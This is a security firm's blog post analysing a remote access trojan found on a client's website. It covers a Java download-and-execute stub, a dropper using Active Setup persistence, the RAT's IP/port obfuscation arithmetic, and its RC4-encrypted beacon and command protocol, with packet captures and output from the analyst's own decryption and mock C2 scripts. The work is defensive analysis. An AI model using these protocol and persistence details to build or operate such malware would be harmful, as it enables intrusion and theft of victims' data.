I've got a real treat for everyone today, as I received approval to blog about an interesting piece of malware I recently reversed as part of a client engagement. Obviously, due to the sensitive nature of this, I'll have to change some stuff to keep everything sanitized and anonymous, but it should still be pretty insightful (I hope) for everyone to see some of the malware we see here at SpiderLabs.
Due to the complexity of these samples, this might be a pretty long blog post. Sorry in advance for that, but hopefully it will be jam-packed with goodness. I'll try to keep everything broken up nicely to make it easier on the readers.
The Backstory
So let's say that we have a client named "Nate's Banana Stand". That's a bit long, so let's call it NBS for short. Well anyways, NBS has a pretty nifty website in case anyone wanted to order banana's online, or just view awesome banana facts. Things were going really well, until one day they noticed that this weird piece of Java code somehow made its way on their site. Obviously something was wrong, and that's where we start our wonderful journey.
The Entry Point
I love it when malware authors write code in Java. Why? Because you can almost always reliably decompile it to wonderful, pretty code. So let's go ahead and do that and see what we have. As you can see below, overall this code is pretty simple. It's effectively taking two parameters (X and Y), storing them into variables, and then evaluating, or executing the code, of an overly long string. Obviously this eval'ed string appears to be the bulk of the code, so we'll want to dig into that further.
Now let's take a look at that long string. Using the power of hitting the Enter key a few times at key places, we can get a better view of exactly what is going on here. I've included some comments in the code for clarity, but just in case you can't read it, I'll try to give a decent summary of what is going on.
So remember those X and Y parameters we snagged earlier? It looks like we're going to end up using them here. One of the first actions this code performs is grabbing the temporary directory of the system it is running on (the victim's). It then takes this directory and throws it into the 'tmp' variable. Then we see the Java code take the 'Name' parameter (previously Y) and append it to the tmp variable. So if we ran this on a Windows machine and the Y parameter equaled "file" we would see this tmp variable store something similar to "C:\Windows\Temp\file".
We then see the Java code make an outbound connection to the 'Url' parameter (previously X). It downloads a file from this URL and stores it into the tmp variable that was defined above. Lastly, we see it execute this downloaded file.
So what is this Java code? Essentially, it's what is referred to as a 'Download and Execute' piece of code. Now it's a matter of seeing what is happening in this file.
The Payload
So we've got this executable file (always good times), which clearly appears to have something embedded inside of it as a resource file. A screenshot of this can be seen below. I'm using CFF Explorer to view the embedded resource files for those interested (http://www.ntcore.com/exsuite.php).
So it's got a resource file. Cool. But how's it getting used? Well, lets fire up IDAPro and see if we can get a better grasp of what is happening. The first thing we notice is that the main function that get's called. It appears to have a high number of variables being used, which is can be a sign of something funny going on. We'll find out why in just a minute, I promise.
As we look further into the code we can see that each variable is being set to a hex value. Do you see anything of interest here?
How about now?
That's right, it appears that the malware authors are building strings by assigning each letter to an individual variable. Using this method, it helps to obfuscate some of the malware's functionality from more simplistic methods of analysis, such as viewing the strings on the file. We see this technique used throughout the rest of the analysis. Not a big problem, just more of a nuisance than anything.
OK, so once we de-obfuscate the strings we can paint a pretty good picture of what this malware is doing. In a nutshell, it's doing the following:
A) Dumps the embedded resource file to a file in the Windows Temporary directory (The resource is in fact, an executable).
B) Writes to the following registry keys:
C) Runs the dumped executable.
D) Deletes itself.
You might be wondering what those registry key writes are all about. Well, essentially these attackers are taking advantage of some old Windows functionality that dates back to Internet Explorer 4. By setting these registry values, the attackers are ensuring that the value set in the 'StubPath' entry gets executed when any user logs in. For more information, check out http://wpkg.org/Adding_Registry_Settings#Active_Setup and http://en.wikipedia.org/wiki/Active_Setup
OK, so where does that leave us? Well, guess what? This malware is essentially a dropper as well, which brings us to the (hopefully) last piece of the puzzle.
The Payload's... Payload
Alright, so we originally had some Java code, which downloaded an executable, which dropped a second executable. And here we are. Malware is fun, isn't it?
So, the first thing that's noticed about this sample is that it is using the same method of string obfuscation (OK, so it's not really obfuscation per se, but it's still annoying) all over the place. What a bunch of jerks. Once we start figuring out what the strings really mean, we can see two domains being set. Again, to keep things somewhat anonymous, lets call them "hate.bananas.net" and "reallyhate.bananas.net". We also see a function, whose sole purpose is to load the wininet.dll library and get the address for a number of functions in this library.
Pretty sneaky, since using this method, we won't see the library or functions in the imports table when performing static analysis. Using these two pieces of information, we can take a guess and say this will most likely be making outbound calls to the hate.bananas.net and reallyhate.bananas.net domains (further inspection confirms this guess). So let's start using some dynamic analysis (in a contained sandbox) to get a better view of what sort of outbound connections this sample is making.
So just to be extra careful, I'm going to use a really nice little utility developed by Mandiant, called ApateDNS (you can grab it for free at http://www.mandiant.com/products/free_software/mandiant_apatedns/). ApateDNS returns a specific IP address for all DNS requests made on the system. So if I set it for 10.20.30.40, all applications will make connections for any domain it attempts to communicate with. We should expect to see the malware making requests to this IP upon execution.
So we start running it, and we see that our DNS requests responses are being made as expected:
*** Please note that my reference to 245.20.180.215 below is simply the result of converting the original IP address of 10.20.30.40, which you will see in a minute. This external IP address had nothing to do with the RAT, so don't think that whatever company that owns this IP is involved with malicious activities. ***
However, once we look at the network traffic in Wireshark, we start seeing requests to 245.20.180.215. What gives!? Well, when we look further into the malware, we can see that it is actually taking the IP address that it receives and 'mangling' it to discover the true IP that it wants to talk with. Closer inspection also reveals that it is using that IP address to discover the port as well. Personally, this is the first time I've seen malware do this, which makes me ecstatic if I'm being perfectly honest. It's always fun to encounter new challenges, since otherwise you're not learning.
Those that don't particularly care about the nitty-gritty details of how this malware is obtaining the real IP address and port, feel free to jump down to 'IP/Port Mangling Continued'. All you really need to know is that, using the method I'm about to describe, the malware ends up getting a specific IP address and port that it will actually connect to.
IP/Port Mangling, Oh My!
Let's take an in-depth look at what it's doing, using 10.20.30.40 as an example.
First thing the malware does is view each individual octet. In this case, 10.20.30.40. Converted to hex, 10.20.30.40 looks like 0A.14.1E.28. The malware breaks up the IP address and looks at each individual octet separately. It takes the octet and XORs it with 0x55, like so:
0x0A ^ 0x55 = 0x5F
The malware then strips off the rightmost digit, leaving us with 0x05. It saves this for later use. The next step taken in this obfuscation process is performing a binary AND operation between the previous 0x5F value and 0x0F (15 in decimal), and appending a "0" to the result. This ends up looking like the following:
(0x5F & 0x0F) = 0x0F
0x0F + "0" = 0xF0
Finally, the malware takes the 0xF0 value and adds it to the previous value of 0x05, like so:
0xF0 + 0x05 = 0xF5 (245 in decimal)
The IP then gets re-assembled, leaving us with:
F5.14.B4.D7 or 245.20.180.215
As I mentioned previously, the port used in the connection is based off of the original IP address as well. This uses a different method, compared to the one previously seen converting the IP address. Let's continue using 10.20.30.40 as an example.
The first thing that happens is the IP address is converted to hex, and the decimal separators are removed. So, 10.20.30.40 becomes 0A.14.1E.28, which in turn becomes 0A141E28. Now we're going to take this value, and strip off the second half:
0A141E28 => 0A14
This value is then subsequently split in half:
0A14 => 0A and 14
These two values will be used going forward, so let's assign them to variables to make things less confusing:
The next step is to take var2 and add 0xFF to it, like so:
0x14 + 0xFF = 0x0113
We're then going to append two zero values to the end of it:
0x0113 => 0x011300
Now the malware takes this value and adds var1 to it:
0x011300 + 0x0A = 0x01130A
Finally, we take the rightmost 2 bytes and convert it to decimal:
0x01130A => 0x130A => 4874
IP/Port Mangling Continued
Using this process, if we were to use 10.20.30.40 as the original IP address, the malware would end up connecting to 245.20.180.215 on port 4874. Pretty tricky, eh? This proves to be an interesting technique used that can provide a buffer, of sorts, between a domain and an IP address. A network/security analyst watching the network traffic will see hate.bananas.net resolve to 10.20.30.40, however, if that same analyst sees outbound connects to 245.20.180.215 on port 4874, that person might not make the connection that they are related and hate.bananas.net is in fact a malicious domain.
One small point of interest about the algorithm used above-- If you use 245.20.180.215 as the original IP, it will actually spit out 10.20.30.40 on the other end. This knowledge is extremely helpful in setting up our testing environment, as we are able to discover what IP address we want ApateDNS to return. That way, the malware will connect to the 'real' IP address instead.
Before I proceed, I believe it is helpful for you to see my testing environment, just in case you're wondering where some of these IP addresses are coming from. I've included a network diagram below of how I have everything configured:
So, we now understand how this malware is making outbound connections. We also see that it is making these outbound connections ever 10 seconds or so. Looking at the network traffic, it also appears to be using the HTTP protocol, as a POST request is made to /ym/Attachments?YY=ABCD, where ABCD is a randomly generated 4 chracter string. We can see this below:
POST /ym/Attachments?YY=OMBB HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1)
Host: 192.168.172.137:56921
Content-Length: 87
Connection: Keep-Alive
Cache-Control: no-cache.yb.j[,.$.%E...n.p...&.o.H5...GV.].]5l4..WX.k......R..E..5.....B.'..#M...F.qj-G....Ue.
HTTP/1.1 200
OK Server: INetSim HTTP Server
Connection: Close
Content-Length: 9
Content-Type: application/octet-stream
Date: Tue, 13 Mar 2012 18:32:24 GMT
I'm using a nice utility called INetSim (http://www.inetsim.org/) to simulate a 'legitimate' HTTP server on a secondary VM. Using the above algorithm, I know that if I configure ApateDNS to resolve to 89.223.159.205, the malware will actually make a connection to 192.168.172.137 on port 56921. This information is included in my network diagram included above.
Decoding the POST Request
The next step is discovering what the payload is in the above HTTP POST request. There is obviously some form of obfuscation/encryption in use, so let's pull up our sleeves and get to work. When it comes to reversing obfuscation/encryption, half of the battle seems to be finding the function(s) used to manipulate the data. Once we find that we can start looking at the specifics of exactly what is happening. The easiest way to do this is to start working backwards from the position where the data is actually being sent over the wire. Eventually we are able to discover the specific function that appears to be 'generating' the data that gets sent over the wire.
When we dig into this function, one of the first things that jumps out to me is this string of 'yb\x13j['.
If we take a look back at the packet that got sent out previously, we can actually see this string (starting at offset 2). I've included the hex of the POST data below to make things a bit easier to read:
000000E0 95 79 62 13 6a 5b 2c 86 24 8f 25 45 b0 ae ec 6e .yb.j[,. $.%E...n 000000F0 95 70 14 e5 03 26 b4 6f 9d 48 35 c3 e1 8d 47 56 .p...&.o .H5...GV 00000100 13 5d 1b 5d 35 6c 34 ae a5 57 58 97 6b 99 d8 13 .].]5l4. .WX.k... 00000110 84 1c 0f 52 b6 c9 0a 45 18 bc 35 fb 0b e8 84 e6 ...R...E ..5..... 00000120 42 1d 27 cc 81 23 4d 12 9c fe 46 b7 71 6a 2d 47 B.'..#M. ..F.qj-G 00000130 18 b8 a2 8d 55 65 ....Ue.
If we look at multiple requests we see this value remains static. It's possible this may be used as a key of some sort, but it's difficult to know at this point. So we'll just leave that one alone for the time being. This leads us to next part of the function, which appears to contain the bulk of its functionality. We see a call to function1, followed by two calls to function2.
Lets dig into function1. After a bit of analysis, we are able to determine that this function's sole purpose is to spit out 8 random bytes and append them to the 'yb\x13j[' string we saw earlier.
We can see this random string appended to the 'yb\x13j[' string below:
Comparing the outgoing data generated by the malware, we're able to confirm that this data is sent out on the wire. The initial byte of 0x95 appears to be static and never changes. This leaves us with the understanding of how the following is generated in the capture shown prior:
000000E0 95 79 62 13 6a 5b 2c 86 24 8f 25 45 b0 ae .yb.j[,. $.%E..
So good news, we're making some progress. It's unlikely this outbound POST request is simply sending out garbage data. That being said, let's keep going to see if we can figure out what the rest of it is. Alright, so moving on to that function2...
So function2 takes 5 arguments. After some investigation, we learn that it takes two integers, two strings (or pointers to strings), and a buffer.
function2(StringPointer1, Integer1, Buffer1, StringPointer2, Integer2)
Further inspection reveals that the integers are in fact the size of their corresponding StringPointers. That is to say, these integers contain the size of the data these pointers reference. The Buffer1 variable also appears to be where the encrypted data is written. Using this knowledge, we can update function2 to the following:
function2(var1, size_of_var1, encrypted_data_buffer, var2, size_of_var2)
Looking even closer at function2, it looks like var1 is actually the unencrypted data. Which helps us narrow down what var2 is. If I had to guess, I'd say var2 is the key being used for encryption, but only time will tell. So again, just to keep things tidy lets clean up function2.
function2(unencrypted_data, unencrypted_data_size, encrypted_data_buffer, potential_key, potential_key_size)
So remember above when we saw function2 get called twice? Let's see what the actual arguments passed into it are. The first time function2 is called, the size of the unencrypted data is 2. The second time it's called, the size of the unencrypted data is 47. In fact, if we look at the unencrypted data in the second call to function2, we see some very interesting data indeed:
Specifically, this malare is grabbing the hostname, username, IP address, and version of Microsoft Windows of the victim. So this appears to be the real information that is exfiltrated in the previously seen POST request. And what about the first call to function2 where it only writes 2 bytes? Well, it turns out that these two bytes hold the value of the size of data being sent. This value is obfuscated in the same way that the second block of data is, which we will be discussing in just a second. So at this point, we know the unencrypted data, we know the 'key' that's being used, and we know where the encrypted data is being written. Now it's just a matter of figuring out how this encryption process works so we can go backwards to decrypt the data seen going across the network.
As before, if you don't feel like going into the finer details of how this obfuscation works, that's completely fine. Feel free to jump to "Reaping the Rewards".
De-obfuscating the Data
So, here we go...
The first thing we see this function block do is create an array of 0 through 255 in hex. We can simulate this in Ruby--
We will see this block of data get manipulated as we continue following the actions taken by this function. After the manipulation occurs we see the following block of data:
As we look further and stare at the code as it executes, we slowly discover that this malware is, in fact, using a popular form of encryption known as RC4. As this post is already far, far too long, I'm not going to go into the specifics of RC4's implementation. Instead, I'd like to refer you to http://en.wikipedia.org/wiki/RC4, which has a fair amount of information on the algorithm that is used.
Now that we know RC4 is being used, and have identified the key, we can begin to work towards decrypting the data seen on the wire.
Reaping the Rewards
Using the information obtained above, I was able to create an encrypt/decrypt script. The nice thing about RC4 is that it uses symmetric substitution. By that I mean if we use the encrypted data as a parameter, the result is the raw data (as shown below).
Decrypting data discovered in packet capture from above:
JGrunzweig - ~> ruby decrypt_dirty_rat.rb "957962136a5b2c86248f2545b0ae" "957014e50326b46f9d4835c3e18d4756135d1b5d356c34aea55758976b99d813841c0f52b6c90a4518bc35fb0be884e6421d27cc81234d129cfe46b7716a2d4718b8a28d5565ec"
Decrypted/Encrypted: TRUSTWAV-C8C316 | TRUSTWAV-C8C316 | Josh | 192.168.112.128 | 5.1??_O
HEX: 0f54525553545741562d43384333313620207c2054525553545741562d433843333136207c204a6f7368207c203139322e3136382e3131322e313238207c20352e3102b8925f4f
Encrypting data by supplying results of above as the data to encrypt:
JGrunzweig - ~> ruby decrypt_dirty_rat.rb "957962136a5b2c86248f2545b0ae" "0f54525553545741562d43384333313620207c2054525553545741562d433843333136207c204a6f7368207c203139322e3136382e3131322e313238207c20352e3102b8925f4f"
Decrypted/Encrypted: ?p?&?o?H5??GV]4??WX?k???R??
E?5?
??B'́#M??F?qj-G???Ue?
HEX: 957014e50326b46f9d4835c3e18d4756135d1b5d356c34aea55758976b99d813841c0f52b6c90a4518bc35fb0be884e6421d27cc81234d129cfe46b7716a2d4718b8a28d5565ec
As a recap, the following packet structure can be seen in this malware:
<KEY><Length (obfuscated)><Data (obfuscated)>
At this point we've cracked the obfuscation in use by this malware, which is awesome because we can now see the actual data being sent under the hood so to speak. But there's got to be more to it than just sending out a string of "recon" data. Let's dig further. I have a feeling this sample has more 'goodies' inside.
Digging further, it appears as though the malware is expecting a response from the remote server. The following screenshot provides a clue as to what the malware is expecting to see:
As you can see, it appears as though the malware is expecting one of several pre-set commands. This is common remote access trojan (RAT) functionality, which provides some insight as to why I named this little guy 'Dirty RAT'.
At this point in the analysis, I've been able to use the knowledge that I've gained to write a quick little server-side script in Ruby that will allow me to accept input and execute commands. An example of the script's output can be seen below:
jgrunzweig@malware:~$ ruby server.rb
[2012-03-19 10:39:44] INFO WEBrick 1.3.1
[2012-03-19 10:39:44] INFO ruby 1.9.2 (2011-07-09) [i686-linux]
[2012-03-19 10:39:44] WARN TCPServer Error: Address already in use - bind(2)
[2012-03-19 10:39:44] INFO WEBrick::HTTPServer#start: pid=24229 port=56921
192.168.172.1 - - [19/Mar/2012:10:40:34 PDT] "POST /ym/Attachments?YY=LWUS HTTP/1.1" 200 41
[*] Connection Received: 192.168.172.138
[*] Data Received: 957962136a5bc02f56682dd0d03abe0d6cabe56d5db62227654e25b86adcd3a69457249e7fbb0b2beeaf2424e32d61706dd3572a2bfb1a012aafd98a4de178660cfcd7bb78e7b81dcd68a3331b148db516ad180feeee61
[*] Data Decrypted: TRUSTWAV-C8C316 | TRUSTWAV-C8C316 | Josh | 192.168.112.128 | 5.1�ogO
- -> /ym/Attachments?YY=LWUS
[*] Connection Received: 192.168.172.138
[*] Sending command of '/DISK' to 192.168.172.138
[*] Data Received: 957962136a5b6b1f9a8a44767c921396a587422e8a82e994bb26bd88b0bb0769cb3770994de5789db719f37b9a2856eccecd8027c10b3b2f20a4d0bb7fe5d39d17a10146f191f5343b0fa5e4b77f659878a5a69540e5c357742553c53b506dc31f0fb97206b01c02b95272ddf4fd0118eb4c601203abcf00c4b1c321dfdd511988dedcc9de4ca6069dd74d6fb6075d
[*] Data Decrypted: TRUSTWAV-C8C316Drive | Type
A: | REMOVEDISK
C: | LOCALDISK
D: | CDROM
Z: | REMOTEDISK
TRUSTWAV-C8C316#�ogO
jgrunzweig@malware:~$
On the wire, it ends up looking something like this:
Conclusions
RATs are not anything new to the malware world, as they've been around for quite some time now. In fact, as I am writing this post, a new version of the popular RAT 'DarkComet' was recently released (http://resources.infosecinstitute.com/darkcomet-analysis-syria/). While many people understand the concept of RATs, many don't understand their internal workings, or the complexities that the authors have incorporated into them. As a network administrator, it would be quite impressive (in my book at least) for them to identify that A) the hate.bananas.net and reallyhate.bananas.net domains are, in fact being used by this RAT, and B) what data is being sent across the network. While they may make the connection that this data is malicious, they may never understand the true nature of what is going on.
In the end, we don't really know what motivated the attackers to target Nate's Banana Stand. It's possible their website contained a public, known vulnerability that the attackers were scanning for. It's also certainly possible that this was a targeted attack aimed at obtaining both credit cards and private banana facts in tandem, as both of these commodities are considered quite valuable on the black market. Whatever the reason, I like to believe that the attackers targeted this client because they knew that "there's always money in the banana stand".